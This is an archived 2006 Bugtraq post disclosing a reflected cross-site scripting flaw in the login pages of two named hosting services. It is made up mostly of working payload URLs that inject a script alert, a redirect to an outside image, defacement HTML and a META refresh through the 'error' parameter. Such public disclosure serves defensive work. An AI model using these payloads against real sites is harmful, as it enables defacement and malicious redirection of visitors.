|
Bugtraq
mailing list archives
URL Bug On 1ASPHost and DomainDLX Hosting Services
From: spymeta () yahoo com
Date: 5 May 2006 16:11:39 -0000
This is an URL Bug on 1ASPHost & DomainDLX Hosting Services Internet Sites :
We Can Run Script, META Tag Or HTML Code.
JScript
Example (1ASP Host) :
http://www.1asphost.com/MainLogin.aspx?error=<script>alert('HACKED%20!')</script>
Example (DomainDLX)
http://www.domaindlx.com/MainLogin.aspx?error=<script>alert('HACKED%20!')</script>
Redirect JScript
Example (1ASP Hosting) :
http://www.1asphost.com/MainLogin.aspx?error=<script>window.location.href="http://members.lycos.co.uk/spymeta/hacked..jpg";</script>
Example (Domaindlx) :
http://www.domaindlx.com/MainLogin.aspx?error=<script>window.location.href="http://members.lycos.co.uk/spymeta/hacked..jpg";</script>
HTML Codes
Example (1ASP Hosting) :
http://www.1asphost.com/MainLogin.aspx?error=<font%20size=20><center><br><br><br><br>HACKED%20By%20SPYMETA%20!<body%20bgcolor=#000000>
Example (DomainDLX) :
http://www.domaindlx.com/MainLogin.aspx?error=<font%20size=20><center><br><br><br><br>HACKED%20By%20SPYMETA%20!<body%20bgcolor=#000000>
META Tags
Example (1ASP HOST): http://www.1asphost.com/MainLogin.aspx?error=<META http-equiv="refresh" content="0;
url=http://members.lycos.co.uk/spymeta/hacked..jpg";>
Example (DomainDLX) :
http://www.DomainDLX.com/MainLogin.aspx?error=<META http-equiv="refresh" content="0;
url=http://members.lycos.co.uk/spymeta/hacked..jpg";>
credits : SPYMETA
 By Date 
By Thread
Current thread:
- URL Bug On 1ASPHost and DomainDLX Hosting Services spymeta (May 06)
| 
Intro
![http://members.lycos.co.uk/spymeta/hacked..jpg"](http://members.lycos.co.uk/spymeta/hacked..jpg"){kind=link}